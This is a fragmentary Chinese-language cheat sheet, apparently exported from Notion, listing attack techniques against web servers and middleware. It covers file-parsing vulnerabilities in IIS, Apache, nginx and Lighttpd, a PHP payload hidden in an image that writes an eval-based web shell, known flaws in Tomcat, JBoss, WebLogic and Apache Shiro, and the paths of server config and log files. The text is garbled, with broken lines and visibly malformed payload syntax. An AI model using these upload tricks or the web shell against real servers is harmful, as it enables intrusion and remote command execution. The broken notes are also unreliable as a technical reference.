<aside> 💡 Notion Tip: 服务器/中间件安全.
</aside>
IIS
、Apache
、nginx
、Lighttpd
、Tomcat
/xx.asp/xx.jpg
,"xx.asp"是文件夹名xx.asp;.jsp
,默认Fast-CGI开启
,直接在url中图片地址后输入/1.php
,会把正常图片当成php解析sp.jpg
,内容:<?PHP fputs(fopen('shell.php'),'w'),'<?php eval()$_POST[cmd]?>');'?>
sp.jpg/.php
,就会生成shell.php
版本≤0.8.37
,利用方法和IIS 7.0/7.5一样,Fast-CGI关闭也可以利用xxx.jpg%00.php
test.php.x1.x2.x3
,Apache是从右往左判断后缀IIS:PUT漏洞、短文件名猜解、远程代码执行、解析漏洞
Apache:解析漏洞、目录遍历
Nginx:文件解析、目录遍历、CRLF注入、目录穿越
Tomcat:远程代码执行、war后门文件部署
JBoss:反序列化漏洞、war后门文件部署
WebLogic:反序列化漏洞、SSRF任意文件上传、war后门文件部署
ApacheShiro反序列化漏洞:ShirorememberMe(Shiro-550)、ShiroPaddingOracleAttack(Shiro-721)
/etc/httpd/conf/
/etc/nginx
C:\\WINNT\\system32\\inetsrv\\MetaBase.bin
C:\\WINDOWS\\system32\\inetsrv\\MetaBase.xml
C:\\WINDOWS\\system32\\inetstr\\config\\applicationHost.config
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
%windir%\\System32\\LogFiles
%SystemDrive%\\inetpub\\logs\\LogFiles